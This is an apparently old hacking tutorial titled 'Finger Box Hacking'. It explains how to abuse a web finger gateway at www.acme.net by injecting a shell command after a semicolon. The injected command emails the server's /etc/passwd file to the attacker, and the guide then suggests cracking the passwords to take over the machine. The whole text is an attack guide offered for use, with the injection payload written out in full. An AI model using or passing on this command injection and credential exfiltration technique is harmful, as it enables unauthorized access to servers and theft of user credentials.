[FINGER BOX HACKING]

Finger servers are hacker's friends. Let's find out whether www.acme.net has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.acme.net /cgi-bin/finger
If the finger gateway is operational a box should appear for you to enter the name you want to finger. 
If it is operational you have another chance to receive the etc/passwd file.

1) get your list of e-mail addresses you found for the site (let's pretend one of them 
   is "kangaroo@acme.net ", and that your email address is "your@email.org")
2) Go back to the finger box, and type this in (changing these email addresses for the real ones):
   kangaroo@acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@acme.net and emails it to your email address. 
If this works you now have the etc/passwd file in your mailbox.... you can now run a crack 
program against it and have a little fun on their box.

